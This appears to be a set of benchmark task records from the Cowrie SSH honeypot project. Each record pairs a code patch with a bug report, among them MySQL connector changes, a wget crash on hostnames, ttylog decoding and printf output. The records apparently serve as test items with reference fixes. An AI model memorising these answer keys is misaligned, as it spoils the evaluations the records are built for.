+++ b/src/cowrie/output/mysql.py
@@ -2,9 +2,6 @@
 MySQL output connector.
 Writes audit logs to MySQL database
 """
-
-import MySQLdb
-
 from twisted.enterprise import adbapi
 from twisted.internet import defer
 from twisted.python import log
@@ -12,6 +9,9 @@
 import cowrie.core.output
 from cowrie.core.config import CowrieConfig
 
+# For exceptions: https://dev.mysql.com/doc/connector-python/en/connector-python-api-errors-error.html
+import mysql.connector
+
 
 class ReconnectingConnectionPool(adbapi.ConnectionPool):
     """
@@ -22,6 +22,11 @@ class ReconnectingConnectionPool(adbapi.ConnectionPool):
     by checking exceptions by error code and only disconnecting the current
     connection instead of all of them.
 
+    CR_CONN_HOST_ERROR: 2003: Cant connect to MySQL server on server (10061)
+    CR_SERVER_GONE_ERROR: 2006: MySQL server has gone away
+    CR_SERVER_LOST 2013: Lost connection to MySQL server
+    ER_LOCK_DEADLOCK 1213: Deadlock found when trying to get lock)
+
     Also see:
     http://twistedmatrix.com/pipermail/twisted-python/2009-July/020007.html
     """
@@ -29,10 +34,17 @@
     def _runInteraction(self, interaction, *args, **kw):
         try:
             return adbapi.ConnectionPool._runInteraction(self, interaction, *args, **kw)
-        except (MySQLdb.OperationalError, MySQLdb._exceptions.OperationalError) as e:
-            if e.args[0] not in (2003, 2006, 2013):
+        except mysql.connector.Error as e:
+            # except (MySQLdb.OperationalError, MySQLdb._exceptions.OperationalError) as e:
+            if e.errno not in (
+                mysql.connector.errorcode.CR_CONN_HOST_ERROR,
+                mysql.connector.errorcode.CR_SERVER_GONE_ERROR,
+                mysql.connector.errorcode.CR_SERVER_LOST,
+                mysql.connector.errorcode.ER_LOCK_DEADLOCK,
+            ):
                 raise e
-            log.msg(f"RCP: got error {e}, retrying operation")
+
+            log.msg(f"output_mysql: got error {e!r}, retrying operation")
             conn = self.connections.get(self.threadID())
             self.disconnect(conn)
             # Try the interaction again
@@ -41,7 +53,7 @@
 
 class Output(cowrie.core.output.Output):
     """
-    mysql output
+    MySQL output
     """
 
     db = None
@@ -52,7 +64,7 @@ def start(self):
         port = CowrieConfig.getint("output_mysql", "port", fallback=3306)
         try:
             self.db = ReconnectingConnectionPool(
-                "MySQLdb",
+                "mysql.connector",
                 host=CowrieConfig.get("output_mysql", "host"),
                 db=CowrieConfig.get("output_mysql", "database"),
                 user=CowrieConfig.get("output_mysql", "username"),
@@ -64,11 +76,11 @@
                 cp_reconnect=True,
                 use_unicode=True,
             )
-        except (MySQLdb.Error, MySQLdb._exceptions.Error) as e:
+        # except (MySQLdb.Error, MySQLdb._exceptions.Error) as e:
+        except Exception as e:
             log.msg(f"output_mysql: Error {e.args[0]}: {e.args[1]}")
 
     def stop(self):
-        self.db.commit()
         self.db.close()
 
     def sqlerror(self, error):
@@ -78,7 +90,7 @@
         """
         if error.value.args[0] in (1146, 1406):
             log.msg(f"output_mysql: MySQL Error: {error.value.args!r}")
-            log.msg("MySQL schema maybe misconfigured, doublecheck database!")
+            log.msg("output_mysql: MySQL schema maybe misconfigured, doublecheck database!")
         else:
             log.msg(f"output_mysql: MySQL Error: {error.value.args!r}")
 
@@ -94,15 +106,19 @@ def simpleQuery(self, sql, args):
     @defer.inlineCallbacks
     def write(self, entry):
         if entry["eventid"] == "cowrie.session.connect":
+            if self.debug:
+                log.msg(f"output_mysql: SELECT `id` FROM `sensors` WHERE `ip` = '{self.sensor}'")
             r = yield self.db.runQuery(
-                "SELECT `id`" "FROM `sensors`" f"WHERE `ip` = {self.sensor}"
+                f"SELECT `id` FROM `sensors` WHERE `ip` = '{self.sensor}'"
             )
 
             if r:
                 sensorid = r[0][0]
             else:
+                if self.debug:
+                    log.msg(f"output_mysql: INSERT INTO `sensors` (`ip`) VALUES ('{self.sensor}')")
                 yield self.db.runQuery(
-                    f"INSERT INTO `sensors` (`ip`) VALUES ({self.sensor})"
+                    f"INSERT INTO `sensors` (`ip`) VALUES ('{self.sensor}')"
                 )
 
                 r = yield self.db.runQuery("SELECT LAST_INSERT_ID()")
Unable to curl or wget URL with hostname

If you try to download anything via curl or wget and the URL contains a hostname instead of an IP address, it crashes. I am pretty sure it is because of
https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and
https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7
(the line marked `# TODO: need to do full name resolution.`).

Example:
```
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@czbrqobpvmssd01:~# wget notino.cz
Connection to czbrqobpvmssd01 closed by remote host.
Connection to czbrqobpvmssd01 closed.
```

```
2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error
Traceback (most recent call last):
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext
    return func(*args, **kw)
--- <exception caught here> ---
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead
    return self._dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage
    transport.SSHServerTransport.dispatchMessage(self, message_num, payload)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage
    self.service.packetReceived(messageNum, payload)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived
    return f(packet)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA
    channel.dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived
    self.client.transport.write(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write
    self.proto.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived
    m()
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN
    self.lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"])
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command
    obj.start()
  File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start
    self.deferred = self.download(self.url, self.outfile)
  File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download
    if ipaddress.ip_address(host).is_private:
  File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address
    address)
builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
```
2021-06-06T13:46:04
cowrie/cowrie
1,576
cowrie__cowrie-1576
[ "1567" ]
90386933e519c933743e9ab24bb7a9d287515975
diff --git a/src/cowrie/commands/apt.py b/src/cowrie/commands/apt.py
--- a/src/cowrie/commands/apt.py
+++ b/src/cowrie/commands/apt.py
@@ -142,8 +142,10 @@ def do_install(self, *args):
             % len(packages)
         )
         self.write("Need to get %s.2kB of archives.\n" % (totalsize))
-        self.write("After this operation, {:.1f}kB of additional disk space will be used.\n".format(
-            totalsize * 2.2)
+        self.write(
+            "After this operation, {:.1f}kB of additional disk space will be used.\n".format(
+                totalsize * 2.2
+            )
         )
         i = 1
         for p in packages:
Unable to curl or wget URL with hostname

If you try to download anything via curl or wget and the URL contains a hostname instead of an IP address, it crashes. I am pretty sure it is because of
https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and
https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7
(the line marked `# TODO: need to do full name resolution.`).

Example:
```
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@czbrqobpvmssd01:~# wget notino.cz
Connection to czbrqobpvmssd01 closed by remote host.
Connection to czbrqobpvmssd01 closed.
```

```
2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error
Traceback (most recent call last):
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext
    return func(*args, **kw)
--- <exception caught here> ---
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead
    return self._dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage
    transport.SSHServerTransport.dispatchMessage(self, message_num, payload)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage
    self.service.packetReceived(messageNum, payload)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived
    return f(packet)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA
    channel.dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived
    self.client.transport.write(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write
    self.proto.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived
    m()
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN
    self.lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"])
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command
    obj.start()
  File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start
    self.deferred = self.download(self.url, self.outfile)
  File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download
    if ipaddress.ip_address(host).is_private:
  File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address
    address)
builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
```
2021-06-09T04:43:08
cowrie/cowrie
1,610
cowrie__cowrie-1610
[ "1567" ]
a48f9f50b946253f1eed84b41ea0368287c22eae
diff --git a/src/cowrie/output/virustotal.py b/src/cowrie/output/virustotal.py --- a/src/cowrie/output/virustotal.py +++ b/src/cowrie/output/virustotal.py @@ -65,6 +65,7 @@ class Output(cowrie.core.output.Output): agent: Any scan_url: bool scan_file: bool + url_cache: Dict[str, float] = {} # url and last time succesfully submitted def start(self): """ @@ -293,6 +294,10 @@ def scanurl(self, entry): """ Check url scan report for a hash """ + if entry["url"] in self.url_cache: + log.msg("output_virustotal: url {} was already successfully submitted".format(entry["url"])) + return + vtUrl = f"{VTAPI_URL}url/report".encode("utf8") headers = http_headers.Headers({"User-Agent": [COWRIE_USER_AGENT]}) fields = { @@ -341,13 +346,16 @@ def processResult(result): j = json.loads(result) log.msg("VT: {}".format(j["verbose_msg"])) + # we got a status=200 assume it was successfully submitted + self.url_cache[entry["url"]] = datetime.datetime.now() + if j["response_code"] == 0: log.msg( eventid="cowrie.virustotal.scanurl", format="VT: New URL %(url)s", session=entry["session"], url=entry["url"], - is_new="true", + is_new="true" ) return d elif j["response_code"] == 1 and "scans" not in j: @@ -377,7 +385,7 @@ def processResult(result): ) log.msg("VT: permalink: {}".format(j["permalink"])) elif j["response_code"] == -2: - log.msg("VT: response=1: this has been queued for analysis already") + log.msg("VT: response=-2: this has been queued for analysis already") log.msg("VT: permalink: {}".format(j["permalink"])) else: log.msg("VT: unexpected response code: {}".format(j["response_code"]))
Unable to curl or wget URL with hostname If you try to download anything via curl or wget and the URL contains a hostname rather than an IP address, it crashes. I am pretty sure it is because of https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7 Line: # TODO: need to do full name resolution. Example: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@czbrqobpvmssd01:~# wget notino.cz Connection to czbrqobpvmssd01 closed by remote host. Connection to czbrqobpvmssd01 closed. 2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File
"/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start self.deferred = self.download(self.url, self.outfile) File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download if ipaddress.ip_address(host).is_private: File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address address) builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
2021-08-04T16:58:21
cowrie/cowrie
1,685
cowrie__cowrie-1685
[ "1684", "1684" ]
68c46118ed41277473cfa79280e0db52a8baf6b5
diff --git a/src/cowrie/output/hpfeeds3.py b/src/cowrie/output/hpfeeds3.py --- a/src/cowrie/output/hpfeeds3.py +++ b/src/cowrie/output/hpfeeds3.py @@ -106,8 +106,8 @@ def write(self, entry): elif entry["eventid"] == "cowrie.log.closed": # entry["ttylog"] - with open(entry["ttylog"]) as ttylog: - self.meta[session]["ttylog"] = ttylog.read().encode().hex() + with open(entry["ttylog"], 'rb') as ttylog: + self.meta[session]["ttylog"] = ttylog.read().hex() elif entry["eventid"] == "cowrie.session.closed": meta = self.meta.pop(session, None)
HPFeeds3 UnicodeDecodeError in ttylog.read().encode().hex() **Describe the bug** Stack trace from cowrie version v2.3.0, as already described in #1307 ``` cowrie | 2022-01-23T14:52:17+0000 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.hpfeeds3.Output object at 0x7f4019656490>>) due to exception: [Failure instance: Traceback: <class 'UnicodeDecodeError'>: 'utf-8' codec can't decode byte 0x88 in position 16: invalid start byte cowrie | /home/cowrie/cowrie/src/cowrie/insults/insults.py:226:connectionLost cowrie | /usr/lib/python3.9/site-packages/twisted/python/threadable.py:51:sync cowrie | /usr/lib/python3.9/site-packages/twisted/python/log.py:281:msg cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_legacy.py:147:publishToNewObserver cowrie | --- <exception caught here> --- cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_observer.py:82:__call__ cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_legacy.py:90:__call__ cowrie | /home/cowrie/cowrie/src/cowrie/core/output.py:240:emit cowrie | /home/cowrie/cowrie/src/cowrie/output/hpfeeds3.py:110:write cowrie | /usr/lib/python3.9/codecs.py:322:decode cowrie | ] cowrie | Traceback (most recent call last): cowrie | File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 226, in connectionLost cowrie | log.msg( cowrie | File "/usr/lib/python3.9/site-packages/twisted/python/threadable.py", line 51, in sync cowrie | return function(self, *args, **kwargs) cowrie | File "/usr/lib/python3.9/site-packages/twisted/python/log.py", line 281, in msg cowrie | _publishNew(self._publishPublisher, actualEventDict, textFromEventDict) cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_legacy.py", line 147, in publishToNewObserver cowrie | observer(eventDict) cowrie | --- <exception caught here> --- cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_observer.py", line 82, in __call__ cowrie | observer(event) cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_legacy.py", line 90, in __call__ cowrie | self.legacyObserver(event) cowrie | File "/home/cowrie/cowrie/src/cowrie/core/output.py", line 240, in emit cowrie | self.write(ev) cowrie | File "/home/cowrie/cowrie/src/cowrie/output/hpfeeds3.py", line 110, in write cowrie | self.meta[session]["ttylog"] = ttylog.read().encode().hex() cowrie | File "/usr/lib/python3.9/codecs.py", line 322, in decode cowrie | (result, consumed) = self._buffer_decode(data, self.errors, final) cowrie | builtins.UnicodeDecodeError: 'utf-8' codec can't decode byte 0x88 in position 16: invalid start byte ``` **Server (please complete the following information):** - OS: Alpine Linux in Docker - Python: Python 3.9 **Additional context** The ttylog seems to be a binary file with only parts of it being text. At the moment the file is opened as a text file, then encoded to utf-8 bytes and then to a hex representation. Opening it as a binary file and directly transforming it to a hex representation should fix it.
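A minimal, self-contained sketch of the fix described above (illustrative only; the temp-file setup stands in for a real ttylog and is not cowrie code):

```python
import os
import tempfile

# A few raw bytes stand in for a ttylog: binary data that is not valid UTF-8.
path = os.path.join(tempfile.mkdtemp(), "ttylog")
with open(path, "wb") as f:
    f.write(b"\x1b[2J\x88\xffls -la\r\n")

# The fix: open in binary mode and hex-encode the bytes directly,
# so the implicit UTF-8 decode (and the extra .encode()) disappears.
with open(path, "rb") as f:
    print(f.read().hex())
```

This mirrors the patch above, which changes `open(entry["ttylog"])` to `open(entry["ttylog"], 'rb')` and drops the `.encode()`.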
2022-01-23T15:24:21
cowrie/cowrie
1,753
cowrie__cowrie-1753
[ "1747" ]
a916722e520ecf1b0aabbff8c78b6b7e6080ef8c
diff --git a/src/cowrie/commands/base.py b/src/cowrie/commands/base.py --- a/src/cowrie/commands/base.py +++ b/src/cowrie/commands/base.py @@ -198,7 +198,7 @@ def call(self): if s.endswith("\\c"): s = s[:-2] - self.write(codecs.escape_decode(s)[0]) + self.writeBytes(codecs.escape_decode(s)[0]) commands["/usr/bin/printf"] = Command_printf
printf crashes **Describe the bug** When using the printf command it crashes **To Reproduce** Steps to reproduce the behavior: 1. login on the honeypot 2. run printf word 3. Server closes **Server (please complete the following information):** - OS:Linux rez-latitude 5.15.0-43-generic Ubuntu SMP x86_64 x86_64 x86_64 GNU/Linux - Python: Python 3.10.4 Log output: ``` 2022-08-01T08:33:19.186990Z [HoneyPotSSHTransport,0,127.0.0.1] Command found: printf rttr 2022-08-01T08:33:19.188861Z [HoneyPotSSHTransport,0,127.0.0.1] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 96, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 80, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 117, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 82, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/posixbase.py", line 683, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 248, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 144, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 148, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/transport.py", line 790, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/service.py", line 50, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 173, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 233, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 126, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 435, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 329, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 493, in handle_RETURN self.lineReceived(line) File 
"/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 190, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 114, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 329, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 310, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 199, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 146, in start self.call() File "/home/cowrie/cowrie/src/cowrie/commands/base.py", line 201, in call self.write(codecs.escape_decode(s)[0]) File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 106, in write self.writefn(data.encode("utf8")) builtins.AttributeError: 'bytes' object has no attribute 'encode' ```
2022-08-18T15:18:07
cowrie/cowrie
1,761
cowrie__cowrie-1761
[ "1758" ]
973e2d999c4c7dfc0fc311d974d6e6fa2de51c02
diff --git a/src/cowrie/commands/gcc.py b/src/cowrie/commands/gcc.py --- a/src/cowrie/commands/gcc.py +++ b/src/cowrie/commands/gcc.py @@ -133,7 +133,7 @@ def start(self): # Schedule call to make it more time consuming and real self.scheduled = reactor.callLater( # type: ignore[attr-defined] - timeout, self.generate_file(output_file if output_file else "a.out") + timeout, self.generate_file, (output_file if output_file else "a.out") ) else: self.no_files()
